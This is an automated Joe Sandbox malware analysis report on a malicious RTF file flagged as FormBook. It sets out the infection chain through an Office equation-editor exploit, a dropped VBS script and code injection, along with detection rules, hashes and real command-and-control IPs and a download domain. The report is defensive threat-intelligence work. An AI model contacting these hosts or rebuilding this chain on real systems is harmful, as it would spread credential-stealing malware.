Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eMJ2QgQF4u.rtf

Overview

General Information

Sample name:eMJ2QgQF4u.rtf
renamed because original name is a hash value
Original sample name:d805f910e1756735e34523281088f2ed.rtf
Analysis ID:1520425
MD5:d805f910e1756735e34523281088f2ed
SHA1:243f7b70a0fde02f3afd3b7d2fe99a786cb505db
SHA256:d43cc5a3d193c33295a70f6861ee2d0ddbeeb165ab106018f06a38cc5297eb57
Tags:rtfVIPKeyloggeruser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected FormBook
Allocates memory in foreign processes
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potential malicious VBS script found (has network functionality)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: AspNetCompiler Execution
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3260 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3340 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3508 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • temp_executable.exe (PID: 3584 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: 3E01AC27E853080CA5C92470DF3F738C)
          • aspnet_compiler.exe (PID: 3664 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
    • EQNEDT32.EXE (PID: 3756 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
eMJ2QgQF4u.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1fb4:$obj2: \objdata
  • 0x1fca:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        7.2.aspnet_compiler.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        7.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          7.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x15f42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Sigma Signatures

          Exploits

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.235.137.223, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3340, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3340, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedifferentofpicture[1].vbs

          System Summary

          barindex
          Sigma detected: Equation Editor Network Connection
          Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3340, Protocol: tcp, SourceIp: 185.235.137.223, SourceIsIpv6: false, SourcePort: 80
          Sigma detected: Suspicious Microsoft Office Child Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , ProcessId: 3508, ProcessName: wscript.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , ProcessId: 3508, ProcessName: wscript.exe
          Sigma detected: AspNetCompiler Execution
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\temp_executable.exe, ParentProcessId: 3584, ParentProcessName: temp_executable.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3664, ProcessName: aspnet_compiler.exe
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , ProcessId: 3508, ProcessName: wscript.exe
          Sigma detected: Modification of IE Registry Settings
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3340, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Sigma detected: Office Macro File Creation
          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-27T10:57:07.632401+020020196961A Network Trojan was detected192.168.2.2249166185.18.213.20443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-27T10:57:07.632401+020020197142Potentially Bad Traffic192.168.2.2249166185.18.213.20443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-27T10:57:09.645046+020028033053Unknown Traffic192.168.2.2249167185.18.213.20443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeReversingLabs: Detection: 21%
          Multi AV Scanner detection for submitted file
          Source: eMJ2QgQF4u.rtfReversingLabs: Detection: 47%
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeJoe Sandbox ML: detected

          Exploits

          barindex
          Office equation editor establishes network connection
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 185.235.137.223 Port: 80Jump to behavior
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 185.18.213.20:443 -> 192.168.2.22:49166 version: TLS 1.2
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: temp_executable.exe, 00000006.00000002.378697765.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378311864.00000000002B0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdbBSJB source: wscript.exe, 00000005.00000003.378978935.000000000312F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363758912.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363766209.0000000003124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379207138.0000000003440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379086218.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000000.364483377.0000000000A82000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.5.dr
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: temp_executable.exe, 00000006.00000002.378697765.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378311864.00000000002B0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdb source: wscript.exe, 00000005.00000003.378978935.000000000312F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363758912.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363766209.0000000003124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379207138.0000000003440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379086218.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000000.364483377.0000000000A82000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.5.dr

          Software Vulnerabilities

          barindex
          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Source: global trafficDNS query: name: dl.zerotheme.ir
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
